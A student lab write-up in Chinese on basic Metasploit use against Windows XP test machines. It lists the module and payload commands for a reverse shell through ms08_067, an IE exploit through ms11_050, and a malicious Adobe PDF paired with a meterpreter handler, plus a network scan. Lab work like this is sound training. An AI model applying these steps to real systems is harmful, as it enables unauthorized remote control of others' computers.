《网络对抗技术》Exp5 MSF基础应用

  1. 一个主动攻击实践(ms08_067)
  2. 一个针对浏览器的攻击(ms11_050)
  3. 一个针对客户端的攻击(adobe_toolbutton)
  4. 成功应用任何一个辅助模块(ipidseq)(唯一)

实验目的

掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路

返回目录


实验环境:

  • 靶机1:Windows XP Professional SP2
  • 靶机2:Windows XP vivian SP3 简体中文

基础问题:

用自己的话解释什么是 exploit , payload , encode 。

  1. exploit:利用漏洞,达到攻击控制受害机的一种手段。
  2. payload:载荷,含有执行攻击的代码,攻击者进行攻击的“武器”。
  3. encode:对攻击代码进行伪装,使得shellcode改变形状。使其能正常运行并尽量免杀。

返回目录


1、主动攻击:ms08_067

  • 使用靶机1和Kali
  • msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块

  • 用show targets查看可以被攻击的靶机的操作系统型号:

  • 用show payloads查看可以供我们使用的攻击载荷:

  • 从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

  • 用show options查看需要设置的参数

  • 设置RHOST(靶机IP)和LHOST(Kali的IP):

  • 设置target选项目标(我攻击的系统为WIN xp 中文简体 SP2,所以选择9)

  • 确认参数设置无误后,用exploit指令开始攻击:

  • 攻击成功后会获取靶机的shell,可以对其进行操作:

返回目录


2、针对浏览器的攻击:ms11_050

  • 使用靶机2和Kali:用search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:
  • 用info查看该模块的信息(这个指令相当于show targets、show options等的集合版):

  • 用set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

用show options确认需要设置的参数是否已经设置好。

  • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

  • 在靶机IE上输入该网址

  • kali中显示session 1已经创建,并显示其会话ID

然而实验2还是失败了 XP系统的IE浏览器已经崩掉了

返回目录


3、针对客户端的攻击:adobe_toolbutton

  • 使用靶机2和Kali:用search adobe查询一下针对该漏洞的攻击模块:

  • 选择一个模块并使用该模块:

  • 用show targets查看可以被攻击的靶机的操作系统型号

  • 设置payload攻击载荷,命令set payload windows/meterpreter/reverse_tcp

  • 用show options查看需要设置的参数:

  • 设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个gapziyun.pdf文件:

  • 如果在kali中找不到这个pdf文件,那么打开文件夹的隐藏文件显示就可以找到

  • 将pdf文件粘贴到靶机win xp

  • 在kali中打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口

  • 在靶机上打开刚刚那个pdf文件可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

返回目录


4、成功应用任何一个辅助模块:ipidseq

  • ipidseq
    功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
  • 用show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:

  • 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

  • 也可以对指定网段的主机进行扫描:

返回目录


实验中遇到的问题

 第二个任务的时候网页一直崩溃,尝试了如下的方法解决:

1.将其加入信任站点(失败

2.对Internet进行重新设置。将杀毒防御功能关闭(无效)

总结一下:可能是攻击程序太经典了。IE已经能检测到此漏洞

返回目录


实验总结与体会

1.通过这次实验基本掌握了msf渗透攻击的“套路”,search 查看漏洞信息,show targets 查看可以攻击的系统,show payloads 选择合适的载荷 ,show options 查看需要修改那些属性,info查看各种详细信息,最后反弹链接shell,只要找到合适的靶机,合适的版本,按流程下来基本都可以解决。

2.实验过程中,失败很多次,其实心态差点爆炸,但是仔细一想网络攻防失败是正常的。静下心来完成了之前剩下的实验。整个实验做完了,感受的是网络攻防过程,而不是那个结果。

返回目录

2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础

    2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 20155232《网络对抗》Exp5 MSF基础应用

    20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...

  4. 20155302《网络对抗》Exp5 MSF基础应用

    20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...

  5. 20155323刘威良《网络对抗》Exp5 MSF基础应用

    20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...

  6. 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用

    20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验  (首用) 渗透实验三:Adobe ...

  7. 20145215《网络对抗》Exp5 MSF基础应用

    20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...

  8. 20145208 蔡野 《网络对抗》Exp5 MSF基础应用

    20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...

  9. 20145311王亦徐 《网络对抗技术》 MSF基础应用

    20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...

  10. 20145325张梓靖 《网络对抗技术》 MSF基础应用

    20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...

随机推荐

  1. 2018年7月6日go语言学习

    Go是一门并发支持.垃圾回收的编译型系统编程语言. 特点:类型安全和内存安全 以非常直观和极低的方案实现高并发 高效的垃圾回收机制 快速编译 为多核计算机提供性能提升方案 Utf-8编码支持 Go源码 ...

  2. Datagrip连接Mysql 和Hive

    连接Mysql file->data source general 填写host,port,user,password, 下载驱动,先别test connection 在ssh中填写host,p ...

  3. hdu4352 数位dp+状态压缩+一个tip

    按照nlogn求lis的方法,把lis的状态压缩了,每次新加一个数就把它右边第一个数的位置置为0,然后把这个数加进去 一个需要注意的地方,如果前面都是0,那么状态s中代表0的位置不可以是1,因为这种情 ...

  4. 网络层HTPPS和HTTP的概念与区别

    HTPPS和HTTP的概念 HTTPS(全称:Hypertext Transfer Protocol over Secure Socket Layer),是以安全为目标的HTTP通道,简单讲是HTTP ...

  5. linux下安装redis并开机自启动

    分享一个博客地址, 写的太好了, 满满的都是干货 ! https://www.cnblogs.com/renzhicai/p/7773080.html

  6. 【原创】MySQL(Innodb)索引的原理

    引言 回想四年前,我在学习mysql的索引这块的时候,老师在讲索引的时候,是像下面这么说的 索引就像一本书的目录.而当用户通过索引查找数据时,就好比用户通过目录查询某章节的某个知识点.这样就帮助用户有 ...

  7. IMCASH:看着朋友赚钱进币圈 我凭啥亏钱? 4月29日币圈报告

    即将过去的四月份,币圈的行情总体是不错的,比特从4000附近最高涨到了5600以上的位置,当前也在5200左右,而成交量更是创出历史天量(4月3日,全球加密货币市场的交易量达890亿美元,创历史天量) ...

  8. 美团小程序框架mpvue蹲坑指南

    美团小程序框架mpvue(花名:没朋友)蹲坑指南 第一次接触小程序大概是17年初,当时小程序刚刚内侧,当时就被各种限制折腾的死去活来的,单向绑定, 没有promise,请求数限制,包大小限制,各种反人 ...

  9. web理论知识--网页访问过程(附有Django的web项目访问流程)

    当我们闲暇之余想上网看看新闻,或者看个电影,通常的操作是:打开电脑.打开浏览器.输入网址.浏览页面信息.点击自己感兴趣的连接......那么有没有想过,这些网页从哪里来的?过程中计算机又做了什么事情了 ...

  10. Beta(2/7)

    鐵鍋燉腯鱻 项目:小鱼记账 团队成员 项目燃尽图 冲刺情况描述 站立式会议照片 各成员情况 团队成员 学号 姓名 git地址 博客地址 031602240 许郁杨 (组长) https://githu ...